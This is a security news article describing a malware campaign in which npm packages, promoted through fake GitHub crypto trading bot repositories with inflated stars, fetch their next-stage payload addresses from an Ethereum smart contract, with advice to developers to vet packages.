A new advanced malware campaign has been discovered, and cybercriminals have developed a novel and creative way to evade traditional security measures. Researchers from ReversingLabs found that threat actors are utilizing Ethereum smart contracts to obfuscate malicious URLs, a method that will make their code durable and extremely hard to detect. This revelation represents a dramatic evolution in the war against software supply chain attacks.
The Hidden Threat in Your Code
Typically, malicious software packages contain suspicious URLs or scripts within their own files, which security scanners are designed to flag. However, in this latest attack, the hackers took a different route. They used two npm packages, “colortoolv2” and “mimelib2,” which only served as “dumb downloaders.” Rather than embedding the malicious code directly, these packages contained instructions to call an Ethereum smart contract after installation and get the location of the next stage of malware. This creative approach allows the malicious activity to be hidden in the public, decentralized ledger of the Ethereum blockchain, making it almost impossible to remove and difficult to trace.
A Fabricated World of Legitimacy
The packages were not distributed at random. ReversingLabs’ investigation revealed they were part of a larger deception campaign on GitHub. The malicious npm packages were concealed in repositories masquerading as legitimate cryptocurrency trading bots with names like ‘solana-trading-bot-v2’ and ‘hyperliquid-trading-bot-v2.’ In order to confer some legitimacy on the repositories, attackers established a coordinated network of fake accounts to have a trusted relationship based on metrics such as stars and commits.
This network has been established as linked to a group called ‘Stargazer’s Ghost Network.’ The total web of accounts inadvertently inflated the apparent credibility of the repositories. These accounts created fake commits and stars while making accounts appear to represent legitimate maintainers to pretend that the project had some level of interest or community. This type of social engineering was primarily targeted at developers who are searching for open-source cryptocurrency tools and would mistake such activity for community support.
The Elusive Nature of the Threat
The attackers had a multi-tiered approach to avoid detection. When one of their payloads, “colortoolv2,” was detected and taken down, the attackers provided another package that was functionally identical, (the attacker’s payload decided to call it “mimelib2”). The attackers were able to continue their attack campaign with hardly any disruptions. The use of a public blockchain for their command and control infrastructure is also smart, as the command and control addresses are stored in immutable ledger that cannot be taken down, but only updated by the attackers which results in a robust and resilient C2 framework.
Evolving Tactics in a Growing Threat Landscape
This recent finding is part of a greater trend of more serious software supply chain attacks and noted that there were 23 incidents related to the software supply chain in the cryptocurrency space in 2024 alone. All of these attacks demonstrated the ability of cybercriminals to find new ways to exploit trusted applications. Past incidents have included using trusted services like Google Drive and GitHub Gist to mask malicious C2 servers, and compromising other well-known packages on registries like PyPI.
A Call for Increased Vigilance
The findings emphasize that there must be caution with using an open-source library in your development work. Developers cannot rely on the formula of traditional, socially accepted indicators of a package’s legitimacy such as the amount of stars a package has or the amount of commits. Experts agree that developers need to be cautious and analyze any library or package before using it. As our threat envelope expands, so too must our approach to security. This new iteration of blockchain technology highlights that threat actors are becoming increasingly elusive and clever, and is a stark reminder that these days, due diligence is more important than ever.
